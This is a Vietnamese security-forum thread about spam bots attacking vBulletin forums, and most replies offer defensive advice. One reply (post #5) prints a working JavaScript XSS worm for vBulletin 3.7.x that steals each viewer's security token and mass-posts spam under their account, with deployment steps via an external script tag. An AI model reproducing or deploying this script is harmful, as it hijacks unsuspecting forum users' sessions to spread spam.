English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Spam bot đang tấn công các forum Việt Nam  XML
  [Question]   Spam bot đang tấn công các forum Việt Nam 28/09/2008 11:16:23 (+0700) | #1 | 153207
shevavn
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 16:25:58
Messages: 3
Offline
[Profile] [PM]
Mình bị spam bot cài vào vbb lâu lâu lại xuất hiện 1 account ko rõ nguồn góc. Nó post bài lung tung nhằm quảng cáo là chính (post bằng tiếng anh). Bác nào có cách khắc phục giúp mình với.
cảm ơn rất nhiều smilie
[Up] [Print Copy]
  [Question]   Re: Spam bot đang tấn công các forum Việt Nam 28/09/2008 13:21:07 (+0700) | #2 | 153231
thiên hương
Member
[Minus]    0    [Plus]
Joined: 09/12/2007 17:39:14
Messages: 28
Offline
[Profile] [PM]
1.đặt chế độ admin kick hoạt mail cho member hoặc tạo 1 đội ngũ mod smod đông đảo và chuyên nghiệp vào smilie
[Up] [Print Copy]
  [Question]   Re: Spam bot đang tấn công các forum Việt Nam 13/02/2009 10:55:28 (+0700) | #3 | 169265
Icttrack
Member
[Minus]    0    [Plus]
Joined: 28/08/2007 23:18:24
Messages: 7
Offline
[Profile] [PM]
chế độ mặc định của vbb là xác thực bằng hình ảnh (captcha) thì chả có spam bot nào ở đây cả, là người hoàn toàn đó bạn
[Up] [Print Copy]
  [Question]   Re: Spam bot đang tấn công các forum Việt Nam 13/02/2009 11:40:47 (+0700) | #4 | 169270
lamer
Elite Member
[Minus]    0    [Plus]
Joined: 26/02/2008 13:28:49
Messages: 215
Offline
[Profile] [PM]

Icttrack wrote:
chế độ mặc định của vbb là xác thực bằng hình ảnh (captcha) thì chả có spam bot nào ở đây cả, là người hoàn toàn đó bạn 


Là người hay bot? http://caca.zoy.org/wiki/PWNtcha smilie
[Up] [Print Copy]
  [Question]   Re: Spam bot đang tấn công các forum Việt Nam 13/02/2009 11:45:17 (+0700) | #5 | 169271
tcp_ip
Member
[Minus]    0    [Plus]
Joined: 25/11/2008 17:14:08
Messages: 1
Offline
[Profile] [PM]
Có cài này về mã Spam tự động mình thấy trên mạng các bạn tham khảo xem nhé.

Khi bạn gửi bài viết của bạn vào diễn đàn không được bảo mật cẩn thận, thì bất kì ai xem đoạn mã này sẽ trở thành nạn nhân phát tán spam.
Lưu ý đoạn mã này dùng cho diễn đàn vbb phiên bản 3.7.x và bài viết có chứa đoạn mã này phải được đưa vào diễn đàn cho phép bật HTML khi viết bài


var targeturl=''//dien dia chi dien dan;
var messagebody=''//dien noi dung bai gui, chu y phai thoat cac ki tu dac biet
var forumindex='2,5,6,7'//dien chi muc cua dien dan ban muon tan cong
function xmlobj() {
try {
var http_request=new XMLHttpRequest();
} catch(e) {
try {
var http_request=new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {
var http_request=null;
}
}
return http_request;
}
function rand(min,max) {
var len=Math.abs(max-min);
return max-Math.floor(Math.random()*(len+1));
}

function mal() {
var rf=forumindex.split(",");
var rd=rand(0,rf.length-1);
if(targeturl.length==0)
var target='newthread.php?do=newthread&f='+rf[rd]
else if(targeturl.length>0)
var target=targeturl+'newthread.php?do=newthread&f='+rf[rd];
else
return false;
GET(target);
function GET(url) {
var xml_instance=xmlobj()
if(!xml_instance)
return null;
var data;
xml_instance.open("GET",url,true);
xml_instance.onreadystatechange=fetchvalue;
xml_instance.send(null);

function fetchvalue() {
if(xml_instance.readyState==4 && xml_instance.status==200) {
data=xml_instance.responseText
var st,end,tok,posthash,time,subject='',message='';
st=data.indexOf("var SECURITYTOKEN = ")+21;
end=data.indexOf("\";",st);
tok=data.substring(st,end);
st=data.indexOf("\"posthash\" value=\"")+18
end=data.indexOf("\"",st)
posthash=data.substring(st,end);
st=data.indexOf("\"poststarttime\" value=\"")+23;
end=data.indexOf("\"",st)
time=data.substring(st,end)
for(i=0;i<=8;i++)
subject+=String.fromCharCode(rand(65,90))
if(messagebody.length>0)
message=messagebody;
else {
for(i=0;i<=300;i++)
message+=String.fromCharCode(rand(40,122))
}
POST(target,"f="+rf[rd]+"&do=postthread&loggedinuser=1&securitytoken="+tok+"&posthash="+posthash+"&poststarttime="+time+"&subject="+subject+"&message="+message)
}
}
}
function POST(url,param) {
var xml_instance=xmlobj()
if(!xml_instance)
return null
xml_instance.open("POST",url,true)
xml_instance.setRequestHeader("Content-Type","application/x-www-form-urlencoded")
xml_instance.onreadystatechange=nothing;
xml_instance.send(param);

function nothing() {}
}
}
setInterval("mal()",1000);

 


Bạn hãy copy đoạn mã trên vào một trình soạn thảo, lưu dưới dạng một file bất kì có đuôi là .js. Sau đó tinh chỉnh nó đi dựa theo chú thích ở trên đầu. Địa chỉ diễn đàn có lẽ không phải điền, vì quá trình truy cập diễn đàn theo đường link tương đối (relative url), thứ bạn cần chỉnh là chỉ mục của diễn đàn cần tấn công và nội dung bài spam, nếu để trống thì kí tự sẽ ngẫu nhiên.

Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script>" với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.

Mình đang test thử xem có đựoc hok . hi hi
Note: Hoá ra cái XSS này có trong HVA rồi. Mình ko tìm hiểu trước. Mong các bạn thông cảm.
/hvaonline/posts/list/27631.html#168988
[Up] [Print Copy]
  [Question]   Re: Spam bot đang tấn công các forum Việt Nam 20/02/2009 12:06:55 (+0700) | #6 | 170191
muaban5s
Member
[Minus]    0    [Plus]
Joined: 19/02/2009 23:28:07
Messages: 2
Offline
[Profile] [PM]
hãy đặt câu hỏi xác nhận bằng tiết việt mà chỉ người việt mới biết tránh ko cho mấy ông tây red nick là ok (chỉ giành cho vbb thôi nhé
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|